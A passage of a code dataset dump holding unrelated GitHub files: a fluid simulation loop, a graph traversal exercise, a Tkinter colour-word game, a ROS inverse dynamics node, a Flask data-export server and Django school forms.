= time.time()\n\n# Start the integration\ntimerSetup = time.time() - walltime + timerSetup\nwalltime = time.time()\n\nq0, _, Kx, Ky, Del2, _, _, x, y = setup_ic_grid(shearFrac, randSeed)\n\nif isRestart: \n dsFile = nc4.Dataset(restartFile)\n zeta = np.copy(dsFile.variables[\"zeta\"]).astype(\"float32\")\n q0 = np.transpose(zeta[-1]).astype(\"float32\")\n ncTime = np.copy(dsFile.variables[\"time\"]).astype(\"float32\")\n qHat = fft2(q0) \n time2d = np.zeros((nx, ny), dtype=np.complex64) + ncTime[-1].astype(np.complex64)\nelse:\n qHat = fft2(q0) \n time2d = np.zeros((nx, ny), dtype=np.complex64) \n\n\nphysicsState = jnp.stack((qHat, time2d), axis=0)\n\nit = 0\niTotal = np.around(t_max / dt).astype(int)\n\n\nwhile it < iTotal:\n physicsState, qHatSet = relay(None, physicsState)\n\n if it < (nSteps * nSprints - 1):\n timerRelay1 = time.time() - walltime + timerRelay1\n walltime = time.time()\n else:\n timerRelayO = time.time() - walltime + timerRelayO\n walltime = time.time()\n\n it = it + nSteps * nSprints\n\n # record data\n q = np.real(nfft.ifft2(qHatSet))\n pHatSet = qHatSet / Del2\n p = np.real(nfft.ifft2(pHatSet))\n u = np.real(nfft.ifft2(-1j * Ky * pHatSet))\n v = np.real(nfft.ifft2(+1j * Kx * pHatSet))\n cfl = np.sqrt(np.max(u ** 2 + v ** 2)) * dt / dx\n print((\"Relay #%4i; CFL =%5.2f \" % (int(it / nSteps / nSprints), cfl)))\n zetaRec = np.transpose(q, axes=[0, 2, 1]).astype(\"float32\")\n psiRec = np.transpose(p, axes=[0, 2, 1]).astype(\"float32\")\n _, time2d = physicsState\n timeRec = np.real(time2d[0, 0]) + np.arange(-nSprints + 1, 1) * dt * nSteps\n # writing to a file when having numRec slices\n fileName = write2ncfile(timeRec, zetaRec, psiRec, x, y)\n print(\"File saved: \" + fileName)\n\n timerWrite = time.time() - walltime + timerWrite\n walltime = time.time()\n\n\nprint(\"Successful completion of integration\\n\")\n\n\nprint(\"Completion of integration\\n\")\n\nprint(\"Setup: %10.6f\" % timerSetup)\nprint(\"1st Relay: %10.6f\" % timerRelay1)\nprint(\"Other %3i: %10.6f\" % (iTotal / nSprints / nSteps - 1, timerRelayO))\nprint(\"Writing Data:%10.6f\" % timerWrite)\n\n","repo_name":"YONGQUAN-QU/BVEX","sub_path":"old_standalone_ref.py","file_name":"old_standalone_ref.py","file_ext":"py","file_size_in_byte":11538,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"69923440129","text":"N, M, V = map(int,input().split())\n\nedges = [[0]*(N+1) for _ in range(N+1)]\nvisited = [0]*(N+1)\n\nfor i in range(M):\n x, y = map(int,input().split())\n edges[x][y] = 1\n edges[y][x] = 1\n\nans = []\n\ndef DFS(n):\n global N, ans\n ans.append(n)\n visited[n] = 1\n for i in range(N+1):\n if edges[n][i] == 1 and visited[i] == 0:\n DFS(i)\n\ndef BFS(n):\n global N, ans, visited\n if n == []:\n return\n\n ans = ans + n\n checked = []\n for i in n:\n visited[i] = 1\n for j in range(N+1):\n if edges[i][j] == 1 and visited[j] == 0:\n visited[j] = 1\n checked.append(j)\n \n BFS(checked)\n\nDFS(V)\nprint(*ans)\nvisited = [0]*(N+1)\nans = []\n\nvisited[V] = 1\nBFS([V])\nprint(*ans)","repo_name":"starga2er/-","sub_path":"2.24/1260.py","file_name":"1260.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25307106802","text":"# informations liées au groupe: Cyrian COURCHAMP, Antoine COUSTENOBLE, Bryan AECK, Matteo COTARD, Sofiya RUGA\n#Groupe: BITD03\n# Github: https://github.com/uvsq22003905/IN200-Projet2\n\n\nimport tkinter as tk\nimport random as rd\n\n\n#fonctions\n\ndef start():\n #démarre le jeu niveau 1 en envoyant la fonction du décompte du temps et de l'affichage des boutons de couleur et du mot\n decompte()\n affichage_boutons()\n\n\ndef start_niveau2():\n #démarre le jeu niveau 2 en envoyant la fonction du décompte du temps, de l'affichage des boutons de couleur et de l'affichage des 3 mots\n decompte2()\n affichage_boutons2()\n affichage_mots_multiples()\n\n\n##Partie faite par Mattéo et Bryan\n\ndef reinitialiser():\n #réinitialise le jeu niveau 1 en effaçant le dernier mot et en remettant le compte à rebours au temps maximum et le score à 0\n global compteur_rebours, compteur, ScoreLabel2,timerLabel2, Mot, a, list_affich_mots\n compteur=0\n compteur_rebours=20\n Mot.destroy()\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n a=0\n\n\ndef reinitialiser2():\n #réinitialise le jeu niveau 2 en effaçant les 3 mots et en remettant le compte à rebours au temps maximum et le score à 0\n global compteur_rebours, compteur, ScoreLabel2,timerLabel2, a, list_affich_mots\n compteur=0\n compteur_rebours=20\n for i in range (0,3):\n list_affich_mots[i].destroy()\n list_affich_mots = []\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n a=0\n\n##Partie faite par Sofiya\n\ndef affichage_boutons():\n #affiche les boutons de couleur et le mot pour le niveau 1\n global Mot, a\n Boutonred=tk.Button(racine, text=listCo[0],background=\"red\",command=red) #Boutons usuels\n Boutonred.place(x=118,y=280)\n Boutonblue=tk.Button(racine, text=listCo[1],background=\"blue\",command=blue) #Boutons usuels\n Boutonblue.place(x=158,y=280)\n Boutongreen=tk.Button(racine, text=listCo[2],background=\"green\",command=green) #Boutons usuels\n Boutongreen.place(x=203,y=280)\n Boutonpink=tk.Button(racine, text=listCo[3],background=\"pink\",command=pink) #Boutons usuels\n Boutonpink.place(x=256,y=280)\n Boutonorange=tk.Button(racine, text=listCo[4],background=\"orange\",command=orange) #Boutons usuels\n Boutonorange.place(x=299,y=280)\n Boutonyellow=tk.Button(racine, text=listCo[5],background=\"yellow\",command=yellow) #Boutons usuels\n Boutonyellow.place(x=363,y=280)\n Boutonwhite=tk.Button(racine, text=listCo[6],background=\"white\",command=white) #Boutons usuels\n Boutonwhite.place(x=425,y=280)\n Mot=tk.Label(racine, text=listNo[Rand2],foreground=listCo[Rand],font=(\"Arial\",30))\n Mot.place(x=250,y=150)\n a=1\n\n##Partie faite par Bryan\n\ndef decompte():\n #lance le compte à rebours pour le niveau 1 et quand il arrive à 0 enregistre le score dans le fichier scores\n global compteur_rebours, timerLabel2, compteur, list_scores\n if compteur_rebours!=0:\n compteur_rebours-=1\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n canvas.after(1000,decompte)\n if compteur_rebours==0:\n fic = open (\"scores.txt\", \"r\")\n ligne = fic.readline()\n list_scores=ligne.split()\n for i in range (0,len(list_scores)):\n list_scores[i]=int(list_scores[i])\n fic.close()\n fic = open (\"scores.txt\", \"w\")\n list_scores.append(compteur)\n for i in range (0,len(list_scores)):\n fic.write(str(list_scores[i])+\" \")\n fic.close()\n\n\ndef decompte2():\n #lance le compte à rebours pour le niveau 2 et quand il arrive à 0 enregistre le score dans le fichier scores_niveau2\n global compteur_rebours, timerLabel2, compteur, list_scores2\n if compteur_rebours!=0:\n compteur_rebours-=1\n timerLabel2.destroy()\n timerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\n timerLabel2.place(x=360, y=110)\n canvas.after(1000,decompte2)\n if compteur_rebours==0:\n fic2 = open (\"scores_niveau2.txt\", \"r\")\n ligne = fic2.readline()\n list_scores2=ligne.split()\n for i in range (0,len(list_scores2)):\n list_scores2[i]=int(list_scores2[i])\n fic2.close()\n fic2 = open (\"scores_niveau2.txt\", \"w\")\n list_scores2.append(compteur)\n for i in range (0,len(list_scores2)):\n fic2.write(str(list_scores2[i])+\" \")\n fic2.close()\n\n##Partie faite par Cyrian\n\ndef red():\n #niveau 1: ajoute un point au score si le mot était rouge et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==0 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef blue():\n #niveau 1: ajoute un point au score si le mot était bleu et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, compteur_rebours, a\n if Rand==1 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n Mot.destroy()\n changement_mot()\n\ndef green():\n #niveau 1: ajoute un point au score si le mot était vert et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==2 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef pink():\n #niveau 1: ajoute un point au score si le mot était rose et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==3 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef orange():\n #niveau 1: ajoute un point au score si le mot était orange et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==4 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef yellow():\n #niveau 1: ajoute un point au score si le mot était jaune et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==5 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef white():\n #niveau 1: ajoute un point au score si le mot était blanc et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==6 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\n##Partie faite par Mattéo\n\ndef changement_mot():\n #efface le mot du niveau 1 et en remet un nouveau de texte et couleur au hasard\n global Mot, Rand, Rand2, a\n if compteur_rebours!=\"STOP\" and a==1:\n Mot.destroy()\n Rand=rd.randint(0,6)\n Rand2=rd.randint(0,6)\n Mot= tk.Label(racine, text=listNo[Rand2],foreground=listCo[Rand],font=(\"Arial\",30))\n Mot.place(x=250,y=150)\n\n##Partie faite par Antoine et Cyrian\n\ndef meilleurs():\n #affiche les 10 meilleurs scores du niveau 1\n fic = open (\"scores.txt\", \"r\")\n ligne = fic.readline()\n list=ligne.split()\n for i in range (0,len(list)):\n list[i]=int(list[i])\n list.sort()\n print(list[-10:])\n fic.close()\n\ndef meilleurs2():\n #affiche les 10 meilleurs scores du niveau 2\n fic2 = open (\"scores_niveau2.txt\", \"r\")\n ligne = fic2.readline()\n list=ligne.split()\n for i in range (0,len(list)):\n list[i]=int(list[i])\n list.sort()\n print(list[-10:])\n fic2.close()\n\n##Partie faite par Mattéo\n\ndef affichage_mots_multiples():\n #affiche 3 mots pour le niveau 2\n global a, list_mots, listCo, listNo, list_affich_mots\n for i in range (0, 3):\n Rand=rd.randint(0,6)\n Rand2=rd.randint(0,6)\n Mot=tk.Label(racine, text=listNo[Rand2],foreground=listCo[Rand],font=(\"Arial\",20))\n Mot.place(x=(100+i*150),y=150)\n list_affich_mots.append(Mot)\n list_mots.append(listCo[Rand])\n a=1\n\n##Partie faite par Sofiya\n\ndef affichage_boutons2():\n #affiche les boutons de couleur pour le niveau 2\n Boutonred=tk.Button(racine, text=listCo[0],background=\"red\",command=red2) #Boutons usuels\n Boutonred.place(x=118,y=280)\n Boutonblue=tk.Button(racine, text=listCo[1],background=\"blue\",command=blue2) #Boutons usuels\n Boutonblue.place(x=158,y=280)\n Boutongreen=tk.Button(racine, text=listCo[2],background=\"green\",command=green2) #Boutons usuels\n Boutongreen.place(x=203,y=280)\n Boutonpink=tk.Button(racine, text=listCo[3],background=\"pink\",command=pink2) #Boutons usuels\n Boutonpink.place(x=256,y=280)\n Boutonorange=tk.Button(racine, text=listCo[4],background=\"orange\",command=orange2) #Boutons usuels\n Boutonorange.place(x=299,y=280)\n Boutonyellow=tk.Button(racine, text=listCo[5],background=\"yellow\",command=yellow2) #Boutons usuels\n Boutonyellow.place(x=363,y=280)\n Boutonwhite=tk.Button(racine, text=listCo[6],background=\"white\",command=white2) #Boutons usuels\n Boutonwhite.place(x=425,y=280)\n\n\n##Partie faite par Cyrian et Antoine\n\ndef red2():\n #niveau 2: ajoute rouge à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"red\")\n score2()\ndef blue2():\n #niveau 2: ajoute blue à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"blue\")\n score2()\ndef green2():\n #niveau 2: ajoute green à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"green\")\n score2()\ndef pink2():\n #niveau 2: ajoute pink à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"pink\")\n score2()\ndef orange2():\n #niveau 2: ajoute orange à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"orange\")\n score2()\ndef yellow2():\n #niveau 2: ajoute yellow à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"yellow\")\n score2()\ndef white2():\n #niveau 2: ajoute white à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"white\")\n score2()\n\n\ndef score2():\n #niveau 2: ajoute un poin au score si les couleurs des 3 mots ont été correctement choisies puis efface ces 3 mots et envoie vers affichage_mots_multiples pour en afficher 3 nouveaux\n global list_mots, list_couleurs, nb_clics, compteur, ScoreLabel2, list_affich_mots\n nb_clics+=1\n if nb_clics == 3:\n if list_mots == list_couleurs:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n for i in range (0,3):\n list_affich_mots[i].destroy()\n list_affich_mots = []\n nb_clics=0\n list_couleurs = []\n list_mots = []\n affichage_mots_multiples()\n\n\n#programme principal fait par Antoine et Sofiya\n\nscore=0\nnb_clics=0\na=0\ncompteur=0\ncompteur_rebours=20\nlist_couleurs=[]\nlist_scores=[]\nlist_scores2=[]\nlist_affich_mots=[]\nlistCo=[\"red\",\"blue\",\"green\",\"pink\",\"orange\",\"yellow\",\"white\"]\nlistNo=['RED','BLUE','GREEN','PINK','ORANGE','YELLOW','WHITE']\nRand=rd.randint(0,6)\nRand2=rd.randint(0,6)\nlist_mots=[]\n\nracine=tk.Tk()\ncanvas = tk.Canvas(racine, width=600, height=400) #creation de la fenetre\n\nScoreLabel= tk.Label(racine, text=\"Score:\",font=(\"papyrus\",11)).place(x=260,y=80)\nScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\nScoreLabel2.place(x=300,y=80)\n\ntimerLabel= tk.Label(racine, text=\"Temps restant:\",font=(\"papyrus\",11)).place(x=260,y=110)\ntimerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\ntimerLabel2.place(x=360, y=110)\n\ntext= tk.Label(racine, text=\"Cliquez sur le bouton correspondant à la couleur des mots, et pas au texte des mots!!!\", font=(\"papyrus\",11)).place(x=25,y=45)\n\nBoutonrereinitialiser=tk.Button(racine, text=\"Reinitialiser Niveau1\",background=\"light grey\",command=reinitialiser) #Boutons usuels\nBoutonrereinitialiser.place(x=425,y=350)\nBoutonrereinitialiser=tk.Button(racine, text=\"Reinitialiser Niveau2\",background=\"light grey\", command=reinitialiser2) #Boutons usuels\nBoutonrereinitialiser.place(x=425,y=320)\n\nBoutongo=tk.Button(racine, text=\"GO-niveau1\",background=\"light grey\",command=start)\nBoutongo.place(x=25,y=350)\nBoutongo2=tk.Button(racine, text=\"GO-niveau2\",background=\"light grey\", command=start_niveau2)\nBoutongo2.place(x=25,y=320)\n\nBouton_meilleurscore=tk.Button(racine, text=\"10 best Niveau1\",background=\"light grey\",command=meilleurs) #Boutons usuels\nBouton_meilleurscore.place(x=140,y=350)\nBouton_meilleurscore=tk.Button(racine, text=\"10 best Niveau2\",background=\"light grey\",command=meilleurs2) #Boutons usuels\nBouton_meilleurscore.place(x=280,y=350)\n\nrectangle1=canvas.create_rectangle(0,0,20,400,fill=\"green\", outline=\"green\")\nrectangle2=canvas.create_rectangle(0,0,600,20,fill=\"green\", outline=\"green\")\nrectangle3=canvas.create_rectangle(580,0,600,400,fill=\"green\", outline=\"green\")\nrectangle4=canvas.create_rectangle(0,380,600,400,fill=\"green\", outline=\"green\")\n\ncanvas.grid()\n\n\n#fin programme\ncanvas.mainloop()\n\n\n\n\n","repo_name":"Caruuuuuu/IN200-Projet2","sub_path":"couleur_AECK.py","file_name":"couleur_AECK.py","file_ext":"py","file_size_in_byte":14596,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10929484389","text":"#!/usr/bin/env python\n\nimport rospy\nfrom Common.Ros_msg_types.data_transformation.msg import Spatial_force, Joints_spatial_force\nfrom Common.Ros_msg_types.vicon_data_publisher.msg import Force_plate_data\nfrom Common.Ros_msg_types.ur_robot_data_acquisition.msg import Joint_parameters\nimport statistics\nfrom rospy import Time\nfrom dataclasses import dataclass\nfrom typing import TypeVar, Generic\nfrom Common.Inverse_dynamics_bottom_up import Inverse_dynamics_force_plate_ur5e, ThreeTuple, SixTupleTuple\nfrom Common.Inverse_dynamics_top_down import Inverse_dynamics_top_down\nfrom typing import Union\n\nT = TypeVar('T')\n\n\n@dataclass\nclass Timed_T(Generic[T]):\n time: Time\n value: T\n\n\nTimed_q = Timed_T[\"list[float]\"]\n\n\nclass Inverse_dynamics_node:\n top_down: Inverse_dynamics_top_down = Inverse_dynamics_top_down()\n bottom_up: Inverse_dynamics_force_plate_ur5e = Inverse_dynamics_force_plate_ur5e()\n\n def __init__(self):\n self.fpd_times: \"list[Time]\" = list()\n self.fpds: \"list[Force_plate_data]\" = list()\n self.previous_q: Timed_q = None\n self.previous_q_dot: Timed_q = None\n\n #############################################\n\n # Higher frequency\n\n def force_plate_data(self, fpd: Force_plate_data, time: rospy.Time):\n self.fpd_times.append(time)\n self.fpds.append(fpd)\n return\n\n #############################################\n\n # Lower frequency\n\n def joint_parameters(self, jp: Joint_parameters, time: rospy.Time) -> Union[Joints_spatial_force, None]:\n # Calculate q, q_dot, q_ddot\n qs = self.__calculate_qs(time=time, jp=jp)\n if qs == None:\n return None\n q, q_dot, q_ddot = qs\n\n # Calculate mean of Force_plate_data\n mean_fpd: Force_plate_data = self.__calculate_mean_fpd()\n if mean_fpd == None:\n return None\n f_force_plate: ThreeTuple = (mean_fpd.fx_N, mean_fpd.fy_N, mean_fpd.fz_N)\n m_force_plate: ThreeTuple = (mean_fpd.mx_Nm, mean_fpd.my_Nm, mean_fpd.mz_Nm)\n\n # Calculate torques\n # bottom_up_torques: SixTuple = bottom_up.calculate_torques(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value, f_force_plate=f_force_plate, m_force_plate=m_force_plate)\n # top_down_torques: SixTuple = top_down.calculate_torques(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)\n\n # Validate bottom_up calculation part without force_plate.\n # Expect to see identical torques. Succeeded 11.08.2023.\n # top_down_torques: SixTuple = top_down.calculate_torques(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)\n # base_force: SixTuple = top_down.calculate_forces(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)[0]\n # bottom_up_torques: SixTuple = bottom_up.calculate_torques_from_base_force(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value, base_force=base_force)\n\n # Calculate forces\n bottom_up_forces: SixTupleTuple = Inverse_dynamics_node.bottom_up.calculate_spatial_forces(\n q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value, f_force_plate=f_force_plate, m_force_plate=m_force_plate)\n top_down_forces: SixTupleTuple = Inverse_dynamics_node.top_down.calculate_spatial_forces(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)\n\n joints_bottom_up = [Spatial_force(m_xyz__f_xyz=force) for force in bottom_up_forces]\n joints_top_down = [Spatial_force(m_xyz__f_xyz=force) for force in top_down_forces]\n\n joints_spatial_force: Joints_spatial_force = Joints_spatial_force(joints_bottom_up=joints_bottom_up, joints_top_down=joints_top_down)\n\n self.fpd_times.clear()\n self.fpds.clear()\n return joints_spatial_force\n\n #############################################\n\n def __calculate_mean_fpd(self) -> \"Union[Force_plate_data, None]\":\n # Ohne Mitteln von Force_plate_data, mit (linearer) Interpolation von Joint_parameters, ginge es auch.\n if len(self.fpds) == 0:\n return None\n mean_fpd: Force_plate_data = Force_plate_data()\n for fieldName in Force_plate_data.__slots__:\n field_values_list: list[float] = [getattr(forcePlateData, fieldName) for forcePlateData in self.fpds]\n field_mean: float = statistics.fmean(field_values_list)\n setattr(mean_fpd, fieldName, field_mean)\n\n return mean_fpd\n\n def __calculate_qs(self, time: Time, jp: Joint_parameters) -> \"Union[tuple[Timed_q, Timed_q, Timed_q], None]\":\n q: Timed_q = Timed_q(time, jp.actual_joint_positions)\n\n if self.previous_q == None:\n self.previous_q = q\n return None\n\n # Jitter in actual_joint_positions will lead to wrong huge velocities.\n # Ideas to fix this: 1euroFilter on actual_joint_positions OR ignore huge velocities.\n # Current workaround: use actual_joint_velocities from the robot instead.\n # q_dot: Timed_q = backward_derivative_secs(q2=q, q1=previous_q)\n q_dot: Timed_q = Timed_q(time, jp.actual_joint_velocities)\n self.previous_q = q\n\n if self.previous_q_dot == None:\n self.previous_q_dot = q_dot\n return None\n\n q_ddot: Timed_q = Inverse_dynamics_node.__backward_derivative_secs(q2=q_dot, q1=self.previous_q_dot)\n self.previous_q_dot = q_dot\n\n return (q, q_dot, q_ddot)\n\n @staticmethod\n def __backward_derivative_secs(q2: Timed_q, q1: Timed_q) -> Timed_q:\n dt_s: float = (q2.time - q1.time).to_sec()\n dq_rad: list[float] = [q2.value[i] - q1.value[i] for i in range(6)]\n q_dot: list[float] = [dq_rad[i] / dt_s for i in range(6)]\n return Timed_q(time=q2.time, value=q_dot)\n","repo_name":"MobMonRob/InverseDynamicsWithForcePlate","sub_path":"Scripts/Common/Inverse_dynamics_node.py","file_name":"Inverse_dynamics_node.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11356010794","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom flask import Flask, request, render_template, send_file, jsonify\nfrom six import BytesIO\n\nfrom canif.decorators import jsonp\nfrom canif.exporter import export_insee_data\n\nimport logging\nlogging.basicConfig()\n\nlogging.getLogger('elasticsearch').setLevel(logging.DEBUG)\nlogging.getLogger('urllib3').setLevel(logging.DEBUG)\n\napp = Flask(__name__)\n\n# from canif.redis import RedisBackend\n# backend = RedisBackend()\n\nfrom canif.elasticsearch import ElasticsearchBackend\nbackend = ElasticsearchBackend()\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\n@app.route('/', methods=['POST'])\ndef upload_form():\n communes = [c for c in request.form['cities_val'].split(\",\") if c]\n variables = [v for v in request.form['variables_val'].split(\",\") if v]\n filename = \"communes-%s-variables-%s.csv\" % (\n ','.join(communes), ','.join(variables)\n )\n mimetype = \"text/csv\"\n output = export_insee_data(backend, communes, variables)\n return send_file(BytesIO(output.read().encode('utf-8')),\n attachment_filename=filename,\n as_attachment=True, mimetype=mimetype)\n\n\n@app.route('/search_variables', methods=['GET'])\n@jsonp\ndef search_variables():\n return jsonify(\n variables=backend.search_variables(request.args.get('query', \"\"))\n )\n\n\n@app.route('/search_variables/', methods=['GET'])\n@jsonp\ndef get_variables(var_ids):\n var_ids = var_ids.split(',')\n return jsonify(\n variables=backend.get_variables(var_ids)\n )\n\n\n@app.route('/search_communes', methods=['GET'])\n@jsonp\ndef search_communes():\n return jsonify(\n communes=backend.search_communes(request.args.get('query', \"\"))\n )\n\n\n@app.route('/search_communes/', methods=['GET'])\n@jsonp\ndef get_communes(codgeos):\n codgeos = codgeos.split(',')\n return jsonify(\n communes=backend.get_communes(codgeos)\n )\n\n\ndef serve():\n app.run(debug=True)\n","repo_name":"Natim/canif","sub_path":"canif/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21704836308","text":"from .models import Student, StudentClass, Exam, Score, Subject, Feedback\nfrom django import forms\nfrom django.contrib.auth.models import User\n# from django.core.validators import ValidationError\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, MultiWidgetField, Submit\n\n\nclass StudentForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(StudentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit', 'Save'))\n\n self.helper.layout = Layout(\n 'admin_no',\n 'first_name',\n 'middle_name',\n 'surname',\n 'gender',\n MultiWidgetField(\n 'dob',\n attrs=(\n {'style': 'width: 30%; display: inline-block;'}\n )\n ),\n 'sclass',\n 'image'\n\n )\n\n class Meta:\n model = Student\n fields = ['admin_no', 'first_name', 'middle_name', 'surname',\n 'gender', 'dob', 'sclass', 'image']\n\n widgets = {\n 'dob': forms.SelectDateWidget(years=[str(val) for val in range(1998, 2005)]),\n }\n\n help_texts = {\n 'dob': 'Enter the day you saw the world'\n }\n\n labels = {\n 'dob': 'Date of Birth',\n 'sclass': 'Class',\n 'admin_no': 'Admission Number'\n }\n\n\nclass StudentClassForm(forms.ModelForm):\n class Meta:\n model = StudentClass\n fields = ['standard', 'year', 'teacher']\n\n\nclass ExamForm(forms.ModelForm):\n class Meta:\n model = Exam\n fields = ['term', 'etype']\n\n labels = {\n 'etype': 'Type'\n }\n\n\nclass ScoreForm(forms.ModelForm):\n class Meta:\n model = Score\n fields = ['student', 'subject', 'exam', 'marks']\n\n # labels = {\n # 'sclass': 'Class'\n # }\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput)\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password']\n\n help_texts = {\n 'username': ' '\n }\n\n\nclass StudentSearchForm(forms.Form):\n\n form = forms.ModelChoiceField(\n queryset=StudentClass.objects.all(),\n required=False,\n empty_label='Select Class',\n )\n name = forms.CharField(\n max_length=100,\n required=False,\n help_text='Search by first name, second name or last name'\n )\n\n def __init__(self, *args, **kwargs):\n super(StudentSearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-inline'\n self.helper.field_template = 'bootstrap3/layout/inline_field.html'\n self.helper.layout = Layout(\n 'name',\n 'form',\n Submit('Search', 'search', css_class='btn-default'),\n )\n self.helper.form_method = 'get'\n\n def get_queryset_filters(self):\n filters = {}\n if self.is_valid():\n name = self.cleaned_data.get('name')\n filters['name'] = name\n\n\nclass ScoreSearchForm(forms.Form):\n\n name = forms.CharField(\n max_length=100,\n required=False,\n help_text='Search by first name, middle_name or last name'\n )\n form = forms.ModelChoiceField(\n queryset=StudentClass.objects.all(),\n required=False,\n empty_label='Select Class',\n )\n subject = forms.ModelChoiceField(\n queryset=Subject.objects.all(),\n required=False,\n empty_label='Select Subject',\n )\n\n def __init__(self, *args, **kwargs):\n super(ScoreSearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-inline'\n self.helper.field_template = 'bootstrap3/layout/inline_field.html'\n self.helper.layout = Layout(\n 'name',\n 'form',\n 'subject',\n Submit('Search', 'search', css_class='btn-default'),\n )\n self.helper.form_method = 'get'\n\n def get_queryset_filters(self):\n filters = {}\n if 